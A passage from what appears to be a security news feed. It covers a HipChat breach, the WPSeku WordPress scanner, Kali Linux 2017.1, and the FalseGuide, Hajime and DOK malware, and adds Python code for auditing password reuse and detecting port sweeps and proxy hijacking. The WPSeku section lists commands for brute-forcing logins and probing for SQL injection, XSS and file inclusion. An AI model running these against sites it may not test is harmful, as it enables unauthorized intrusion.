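    """Usernames whose current password is in an earlier breach's plaintext list.

    Salting and slow hashing protect the stored hashes; they do nothing for a
    password the user reused elsewhere, which is why a forced reset is still needed.
    """
    reused = []
    for username, record in records.items():
        if any(verify_password(pw, record) for pw in leaked_passwords):
            reused.append(username)
    return sorted(reused)


if __name__ == "__main__":
    # Constructed sample data: two users, one of whom reused a password from an older breach.
    users = {
        "alice": hash_password("correct horse battery staple"),
        "bob": hash_password("hunter2"),
    }
    earlier_breach = ["123456", "hunter2", "letmein"]
    print("alice verifies:", verify_password("correct horse battery staple", users["alice"]))
    print("distinct records for equal passwords:", same_password_distinct_records("hunter2"))
    print("cost of one guess (s):", round(seconds_per_guess(ITERATIONS), 4))
    print("accounts to force-reset:", reuse_audit(users, earlier_breach))
```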


How Many victims?

HipChat did not say how many users may have been affected by the incident, but the company is taking several proactive steps to secure its users.

What is HipChat doing?

As a precaution, HipChat has invalidated passwords on all potentially affected HipChat-connected accounts, and emailed password reset instructions, forcing every user to reset their account password.

The company is also attempting to track down and fix the security vulnerability in the third-party library used by its service that allowed for the breach.

In response to the attack, the company is also updating its HipChat Server that will be shared with its customers directly through the standard update channel.

HipChat has also isolated the affected systems and closed any unauthorized access.

HipChat parent company Atlassian is also actively working with law enforcement on the investigation of this matter.


What Should You Do Now?

For obvious reasons, all HipChat customers are highly recommended to change their passwords as soon as possible.

You should also be particularly alert to phishing emails, which are usually the next step of cyber criminals after a breach. Phishing is designed to trick users into giving up further details like passwords and bank information.

written by Swati Khandelwal

WPSeku - Simple Wordpress Security Scanner


WPSeku is a black box WordPress vulnerability scanner that can be used to scan remote WordPress installations to find security issues.

Usage

_
__ ___ __ ___ ___| | ___ _
\ \ /\ / / '_ \/ __|/ _ \ |/ / | | |
\ V V /| |_) \__ \ __/ <| |_| |
\_/\_/ | .__/|___/\___|_|\_\\__,_|
|_|
[--] WPSeku - Wordpress Security Scanner
[--] WPSeku - v0.1.0
[--] Momo Outaadi (@M4ll0k)
[--] https://github.com/m4ll0k/WPSeku

Usage: wpseku.py --url URL

-u --url Site URL (e.g: http://site.com)
-e --enum
[u: Usernames Enumeration
-p --plugin
[x: Search Cross Site Scripting vuln
[l: Search Local File Inclusion vuln
[s: Search SQL Injection vuln
-t --theme
[x: Search Cross Site Scripting vuln
[l: Search Local File Inclusion vuln
[s: Search SQL Injection vuln
-b --brute
[l: Bruteforce password login
[x: Bruteforce password login via XML-RPC
--user Set username, try with enum users
--wordlist Set wordlist
-h --help Show this help and exit
Examples:
wpseku.py -u www.site.com
wpseku.py -u www.site.com -e [u]
wpseku.py -u site.com/path/wp-content/plugins/wp/wp.php?id= -p [x,l,s]
wpseku.py -u site.com --user test --wordlist dict.txt -b [l,x]


Screenshot

Kali Linux 2017.1 Release

As with all new releases, you have the common denominator of updated packages, an updated kernel that provides more and better hardware support, as well as a slew of updated tools – but this release has a few more surprises up its sleeve.

Support for RTL8812AU Wireless Card Injection

These drivers are not part of the standard Linux kernel, and have been modified to allow for injection. Why is this a big deal? This chipset supports 802.11 AC, making this one of the first drivers to bring injection-related wireless attacks to this standard, and with companies such as ALFA making the AWUS036ACH wireless cards, we expect this card to be an arsenal favourite.

The driver can be installed using the following commands:
apt-get update
apt install realtek-rtl88xxau-dkms

Streamlined Support for CUDA GPU Cracking

Installing proprietary graphics drivers has always been a source of frustration in Kali. Fortunately, improvements in packaging have made this process seamless – allowing our users a streamlined experience with GPU cracking. Together with supported hardware, tools such as Hashcat and Pyrit can take full advantage of NVIDIA GPUs within Kali. For more information about this new feature, check out the related blog post and updated official documentation.


Amazon AWS and Microsoft Azure Availability (GPU Support)

Due to the increasing popularity of using cloud-based instances for password cracking, we decided to focus our efforts into streamlining Kali’s approach. Amazon’s AWS P2-Series and Microsoft’s Azure NC-Series allow pass-through GPU support so we made corresponding AWS and Azure images of Kali that support CUDA GPU cracking out of the box. You can check out Cracking in the Cloud with CUDA GPUs.


OpenVAS 9 Packaged in Kali Repositories

One of the most lacking tool categories in Kali (as well as the open-source arena at large) is a fully-fledged vulnerability scanner. OpenVAS isn't included in the default Kali release due to its large footprint, but it can easily be downloaded and installed using the following commands:

apt-get update
apt install openvas

Download Kali Linux 2017.1

New Android Malware Infected 2 Million Google Play Store Users


Initially thought to be 600,000 users, the number of Android users who have mistakenly downloaded and installed malware on their devices straight from Google Play Store has reached 2 Million.

Yes, about 2 Million Android users have fallen victim to malware hidden in over 40 fake companion guide apps for popular mobile games, such as Pokémon Go and FIFA Mobile, on the official Google Play Store, according to security researchers from Check Point.

Dubbed FalseGuide by the Check Point researchers, the malware creates a "silent botnet out of the infected devices" to deliver fraudulent mobile adware and generate ad revenue for cybercriminals.

Nearly 2 Million Android Users Infected!

While initially it was believed that the oldest instance of FalseGuide was uploaded to Google Play in February and made its way onto over 600,000 devices within two months, further in-depth analysis by researchers revealed more infected apps, which date back to November 2016.
"Since April 24, when the article below was first published, Check Point researchers learned that the FalseGuide attack is far more extensive than originally understood," Check Point researchers wrote in a blog post.
"The apps were uploaded to the app store [Google Play Store] as early as November 2016, meaning they hid successfully for five months, accumulating an astounding number of downloads."


Russian connection with FalseGuide


Check Point researchers discovered five additional apps containing the FalseGuide malware on Google Play Store, developed by "Anatoly Khmelenko" (translated from Russian Анатолий Хмеленко).

Also, the first batch of malicious apps was submitted under the Russian names of two fake developers, Sergei Vernik and Nikolai Zalupkin, which suggests the malware is of Russian origin.

FalseGuide attempts to turn infected devices into a botnet that could allow its operator to control the devices without the knowledge of the device owners.


Here's How FalseGuide Works:

While downloading to the victim's phone, FalseGuide requests administrative permissions to the device in an attempt to avoid being deleted by the user.

The malware then registers itself with Firebase Cloud Messaging – a cross-platform messaging service that allows app developers to send messages and notifications.

Once subscribed to this service, FalseGuide can allow the attackers to send messages containing links to additional malware and install them to the infected device, enabling attackers to display illegitimate pop-up ads out of context and generate revenue.

Depending on their objectives, the attackers could also inject highly malicious code into an infected device to root it, conduct a Distributed Denial of Service (DDoS) attack, or even penetrate private networks.

Google Removed the Malware-Hidden Apps, but Are You Clean?


Check Point has provided a full list of malicious apps hiding FalseGuide, which posed as guides for FIFA Mobile, Criminal Case, Super Mario, Subway Surfers, Pokemon Go, Lego Nexo Knights, Lego City My City, Ninjago Tournament, Rolling Sky, Amaz3ing Spider-Man, Drift Zone 2, Dream League Soccer, and many more.

Check Point researchers notified Google about FalseGuide in February, after which the company silently removed the malware apps from the Play Store.

But despite being removed, the malicious apps are likely still active on a number of devices, leaving Android users open to cyber attacks.
"Mobile botnets are a growing trend since early last year, growing in both sophistication and reach," CheckPoint said. "This type of malware manages to infiltrate Google Play due to the non-malicious nature of the first component, which only downloads the actual harmful code."


How to Protect yourself against such Malware


There are standard protection measures you need to follow to remain unaffected:

  • Always download apps which are from trusted and verified developers and stick to trusted sources, like the Google Play Store and the Apple App Store.
  • Always verify app permissions before installing apps. If any app is asking for more than what it is meant for, just do not install it.
  • Keep a good antivirus app on your device that can detect and block such malware before it can infect your device. Always keep the app up-to-date.
  • Do not download apps from third-party sources. Although in this case the app was distributed through the official Play Store, most often such malware is distributed via untrusted third-party app stores.
  • Avoid unknown and unsecured Wi-Fi hotspots and keep your Wi-Fi turned OFF when not in use.
  • Be careful which apps you give administrative rights to. Admin rights are powerful and can give an app full control of your device.
  • Never click on links in SMS or MMS sent to your mobile phone. Even if the message looks legit, go directly to the website of origin and verify any possible updates.
written by Mohit Kumar

Hajime ‘Vigilante Botnet’ Growing Rapidly; Hijacks 300,000 IoT Devices Worldwide

Last week, we reported about a so-called 'vigilante hacker' who hacked into at least 10,000 vulnerable 'Internet of Things' devices, such as home routers and Internet-connected cameras, using a botnet malware in order to supposedly secure them.

Now, that vigilante hacker has already trapped roughly 300,000 devices in an IoT botnet known as Hajime, according to a new report published Tuesday by Kaspersky Lab, and this number will rise with each day that passes by.

The IoT botnet malware emerged in October 2016, around the same time the infamous Mirai botnet threatened the Internet last year with record-setting distributed denial-of-service (DDoS) attacks against the popular DNS provider Dyn.

How the Hajime IoT Botnet Works

The Hajime botnet works much like Mirai: it spreads via unsecured IoT devices that have open Telnet ports and use default passwords, and it uses the same list of username and password combinations that Mirai is programmed to use.

However, the interesting part of the Hajime botnet is that, unlike Mirai, once Hajime infects an IoT device, it secures it by blocking access to four ports (23, 7547, 5555, and 5358) known to be the most widely used vectors for infecting IoT devices, keeping Mirai and other threats at bay.

Hajime also uses a decentralized peer-to-peer network (instead of a command-and-control server) to issue updates to infected devices, making it more difficult for ISPs and Internet providers to take down the botnet.

One of the most interesting things about Hajime is the botnet also displays a cryptographically signed message every 10 minutes or so on infected device terminals, describing its creators as "just a white hat, securing some systems."

Unlike Mirai and other IoT botnets, Hajime lacks DDoS capabilities and other hacking skills except for the propagation code that lets one infected IoT device search for other vulnerable devices and infects them.
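As an added example (not from the article or from Kaspersky), detection logic for the spreading behaviour described above: it reads Linux iptables-style LOG lines (that log format is an assumption) and flags any source that has probed the four infection ports on several distinct hosts, which is what an infected device looks like from a router or gateway while it searches for its next victims. The log lines, addresses and thresholds are constructed.

```python
import re
from collections import defaultdict

# The four ports the article names: Telnet (23), TR-069 (7547), 5555 and 5358.
# A Mirai-style worm probes them to spread; Hajime blocks them after infection.
IOT_INFECTION_PORTS = {23, 7547, 5555, 5358}

# Assumption: logs are in the Linux iptables/nftables LOG target's key=value format.
_LOG_RE = re.compile(
    r"SRC=(?P<src>[\d.]+) DST=(?P<dst>[\d.]+) .*?PROTO=(?P<proto>\w+) "
    r"SPT=(?P<spt>\d+) DPT=(?P<dpt>\d+)"
)

# Constructed sample: 192.168.1.50 (say, an IP camera) sweeps its neighbours on the
# infection ports; 192.168.1.2 is an admin workstation doing ordinary SSH/HTTPS.
SAMPLE_LOG = """\
Apr 26 10:01:03 gw kernel: FW-SCAN IN=br0 OUT= SRC=192.168.1.50 DST=192.168.1.10 LEN=60 PROTO=TCP SPT=41022 DPT=23 SYN
Apr 26 10:01:03 gw kernel: FW-SCAN IN=br0 OUT= SRC=192.168.1.50 DST=192.168.1.10 LEN=60 PROTO=TCP SPT=41023 DPT=7547 SYN
Apr 26 10:01:04 gw kernel: FW-SCAN IN=br0 OUT= SRC=192.168.1.50 DST=192.168.1.11 LEN=60 PROTO=TCP SPT=41024 DPT=23 SYN
Apr 26 10:01:04 gw kernel: FW-SCAN IN=br0 OUT= SRC=192.168.1.50 DST=192.168.1.12 LEN=60 PROTO=TCP SPT=41025 DPT=5555 SYN
Apr 26 10:01:05 gw kernel: FW-SCAN IN=br0 OUT= SRC=192.168.1.50 DST=192.168.1.13 LEN=60 PROTO=TCP SPT=41026 DPT=23 SYN
Apr 26 10:01:09 gw kernel: FW-SCAN IN=br0 OUT= SRC=192.168.1.2 DST=192.168.1.10 LEN=60 PROTO=TCP SPT=50211 DPT=22 SYN
Apr 26 10:01:10 gw kernel: FW-SCAN IN=br0 OUT= SRC=192.168.1.2 DST=192.168.1.11 LEN=60 PROTO=TCP SPT=50212 DPT=443 SYN
Apr 26 10:01:12 gw kernel: FW-SCAN IN=eth0 OUT= SRC=198.51.100.7 DST=192.168.1.1 LEN=60 PROTO=TCP SPT=6000 DPT=23 SYN
Apr 26 10:01:13 gw kernel: FW-SCAN IN=br0 OUT= SRC=192.168.1.50 DST=192.168.1.10 LEN=60 PROTO=UDP SPT=41030 DPT=5358
"""


def parse_line(line):
    """Return (src, dst, dport) for a TCP LOG line, or None for anything else."""
    m = _LOG_RE.search(line)
    if m is None or m.group("proto") != "TCP":
        return None
    return m.group("src"), m.group("dst"), int(m.group("dpt"))


def infection_port_targets(lines):
    """Map each source to the set of distinct hosts it hit on an infection port."""
    targets = defaultdict(set)
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        src, dst, dport = parsed
        if dport in IOT_INFECTION_PORTS:
            targets[src].add(dst)
    return targets


def find_propagating_hosts(lines, min_targets=3):
    """Sources that probed infection ports on at least min_targets distinct hosts.

    A single Telnet connection is routine; one device fanning out across the
    subnet on these ports is the worm's propagation phase.
    """
    return {
        src: sorted(dsts)
        for src, dsts in infection_port_targets(lines).items()
        if len(dsts) >= min_targets
    }


def ports_probed_by(lines, src):
    """Which infection ports a given source has touched; useful when triaging a hit."""
    ports = set()
    for line in lines:
        parsed = parse_line(line)
        if parsed and parsed[0] == src and parsed[2] in IOT_INFECTION_PORTS:
            ports.add(parsed[2])
    return ports


if __name__ == "__main__":
    lines = SAMPLE_LOG.splitlines()
    for src, dsts in find_propagating_hosts(lines).items():
        print(f"{src} is sweeping {len(dsts)} hosts on ports {sorted(ports_probed_by(lines, src))}")
```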

But What if…?


What's not known is what the Hajime botnet is for, or who is behind it.
"The most intriguing thing about Hajime is its purpose," say Kaspersky security researchers. "While the botnet is getting bigger and bigger, partly due to new exploitation modules, its purpose remains unknown. We haven’t seen it being used in any type of attack or malicious activity," adding that "its real purpose remains unknown."
Also, the researchers believe that this might not happen, because the Hajime botnet takes steps to hide its running processes and files on the file system, making the detection of infected systems more difficult.

So far, the purpose behind building this botnet is not entirely clear, but all signs yet point to a possible white-hat hacker, who is on his/her mission to secure open and vulnerable systems over the Internet.

However, the most concerning issue of all — Is there any guarantee that the Hajime author will not add attack capabilities to the worm to use the hijacked devices for malicious purposes?


Maybe today the Hajime author is on a mission to secure the world, but tomorrow, when he or she realizes the botnet could be rented out to others for money, he or she could be another Adam Mudd.

Mudd, a 19-year-old teenager, has recently been sentenced to 2 years in prison for creating and running a DDoS-for-hire service called 'Titanium Stresser' that made more than 1.7 million victims of DDoS attacks since 2013.

Secondly, What if the well-intentioned botnet is hijacked by some malicious actor?


If this happens, the vigilante IoT botnet could be used for malicious purposes, such as conducting DDoS attacks against online sites and services, spreading malware, or instantly bricking the infected devices at one click.

Radware researchers also believe that the flexible and extensible nature of the Hajime botnet can be used for malicious purposes, like those mentioned above and conducting real-time mass surveillance from Internet-connected webcams, according to a new threat advisory published Wednesday by Radware.

Last but not least: Do we seriously need some vigilante hackers to protect our devices and network?


This solution could be temporary, trust me. For example, the latest Hajime botnet is nothing but a band-aid.

Since Hajime has no persistence mechanism, as soon as the infected device is rebooted, it goes back to its previously unsecured state, with default passwords and the Telnet port open to the world.

How to Protect your IoT devices?


The only true solution is You — Instead of just sitting over there, doing nothing and waiting for some vigilante hackers to do miracles, you can protect your IoT devices in a way Hajime or any well-intentioned botnet can't do.

So go and update the firmware of your devices, change their default passwords, put them behind a firewall, and if any device is vulnerable by default and cannot be updated, throw it away and buy a new one.

Just keep in mind: once a single IoT device of yours gets compromised, your whole network, and every device connected to it, is at risk of being compromised too.

New MacOS Malware, Signed With Legit Apple ID, Found Spying On HTTPS Traffic


Many people believe that they are much less likely to be bothered by malware if they use a Mac computer, but is it really true? Unfortunately, No.

According to the McAfee Labs, malware attacks on Apple's Mac computers were up 744% in 2016, and its researchers have discovered nearly 460,000 Mac malware samples, which is still just a small part of overall Mac malware out in the wild.

Today, the Malware Research team at CheckPoint has discovered a new piece of fully-undetectable Mac malware, which according to them affects all versions of Mac OS X, has zero detections on VirusTotal and is "signed with a valid developer certificate (authenticated by Apple)."

Dubbed DOK, the malware is being distributed via a coordinated email phishing campaign and, according to the researchers, is the first major scale malware to target macOS users.

The malware has been designed to gain administrative privileges and install a new root certificate on the target system, which allows attackers to intercept and gain complete access to all victim communication, including SSL encrypted traffic.

Almost three months ago, Malwarebytes researchers also discovered a rare piece of Mac-based espionage malware, dubbed Fruitfly, that was used to spy on biomedical research center computers and remained undetected for years.

Here's How the DOK Malware Works:

The malware is distributed via a phishing email masquerading as a message regarding supposed inconsistencies in the recipient's tax returns, tricking the victim into running an attached malicious .zip file, which contains the malware.

Since the malware author is using a valid developer certificate signed by Apple, the malware easily bypasses Gatekeeper -- an inbuilt security feature of the macOS operating system by Apple. Interestingly, the DOK malware is also undetectable in almost all antivirus products.

Once installed, the malware copies itself to the /Users/Shared/ folder and then adds itself as a "loginItem" in order to persist, so that it executes automatically every time the system reboots until it finishes installing its payload.

The malware then creates a window on top of all other windows, displaying a message claiming that a security issue has been identified in the operating system and an update is available, for which the user has to enter his/her password.

Once the victim installs the "update", the malware gains administrator privileges on the victim's machine and changes the victim system's network settings, allowing all outgoing connections to pass through a proxy.

According to CheckPoint researchers, "using those privileges, the malware will then install brew, a package manager for OS X, which will be used to install additional tools – TOR and SOCAT."


DOK Deletes itself after Setting up Attacker's Proxy



The malware then installs a new root certificate in the infected Mac, which allows the attacker to intercept the victim’s traffic using a man-in-the-middle (MiTM) attack.
"As a result of all of the above actions, when attempting to surf the web, the user’s web browser will first ask the attacker web page on TOR for proxy settings," the researchers say.

"The user traffic is then redirected through a proxy controlled by the attacker, who carries out a Man-In-the-Middle attack and impersonates the various sites the user attempts to surf. The attacker is free to read the victim's traffic and tamper with it in any way they please."
According to the researchers, almost no antivirus has updated its signature database to detect the DOK OS X malware, as the malware deletes itself once it has modified the proxy settings on the target machine for interception.
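As an added example (not from the article or from Check Point), a check for the network-settings change described above: it parses the output of macOS `scutil --proxy` (the dictionary format and key names are assumed from that tool) and flags an enabled proxy auto-config URL or HTTP/HTTPS/SOCKS proxy host that is not on an allowlist, which is the state DOK leaves behind after it deletes itself. Both sample outputs are constructed, and the .onion URL is a placeholder.

```python
import re
from urllib.parse import urlparse

# Constructed `scutil --proxy` output from a Mac configured the way the article
# describes: proxy auto-config enabled and pointing at a hidden service (placeholder URL).
SAMPLE_SCUTIL_PROXY = """\
<dictionary> {
  ExceptionsList : <array> {
    0 : *.local
    1 : 169.254/16
  }
  FTPPassive : 1
  HTTPEnable : 0
  HTTPSEnable : 0
  ProxyAutoConfigEnable : 1
  ProxyAutoConfigURLString : http://placeholder-hidden-service.onion/proxy.pac
}
"""

# Constructed output from a machine with no proxy configured at all.
CLEAN_SCUTIL_PROXY = """\
<dictionary> {
  ExceptionsList : <array> {
    0 : *.local
    1 : 169.254/16
  }
  FTPPassive : 1
}
"""

_KV_RE = re.compile(r"^\s*([A-Za-z]+) : (.+?)\s*$")


def parse_scutil_proxy(text):
    """Flatten the top-level 'Key : Value' pairs; nested arrays are skipped."""
    settings = {}
    depth = 0
    for line in text.splitlines():
        if line.strip().endswith("{"):
            depth += 1
            continue
        if line.strip() == "}":
            depth -= 1
            continue
        m = _KV_RE.match(line)
        if m and depth == 1:
            settings[m.group(1)] = m.group(2)
    return settings


def audit_proxy(settings, allowed_hosts=()):
    """Findings for proxy settings that route traffic through hosts you did not configure."""
    findings = []
    if settings.get("ProxyAutoConfigEnable") == "1":
        url = settings.get("ProxyAutoConfigURLString", "")
        host = urlparse(url).hostname or ""
        if host not in allowed_hosts:
            findings.append(f"PAC enabled from unexpected host: {url}")
    for scheme in ("HTTP", "HTTPS", "SOCKS"):
        if settings.get(f"{scheme}Enable") == "1":
            host = settings.get(f"{scheme}Proxy", "")
            port = settings.get(f"{scheme}Port", "")
            if host not in allowed_hosts:
                findings.append(f"{scheme} proxy enabled to unexpected host: {host}:{port}")
    return findings


def audit_text(text, allowed_hosts=()):
    """Convenience wrapper: raw scutil output in, list of findings out."""
    return audit_proxy(parse_scutil_proxy(text), allowed_hosts)


if __name__ == "__main__":
    # On a real Mac, feed it subprocess.run(["scutil", "--proxy"], capture_output=True, text=True).stdout
    for finding in audit_text(SAMPLE_SCUTIL_PROXY, allowed_hosts=("proxy.corp.example",)):
        print("FINDING:", finding)
```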

Apple can resolve this issue just by revoking the developer certificate being abused by the malware author.

Meanwhile, users are always recommended to avoid clicking links contained in messages or emails from untrusted sources and to always pay extra attention before providing their root password.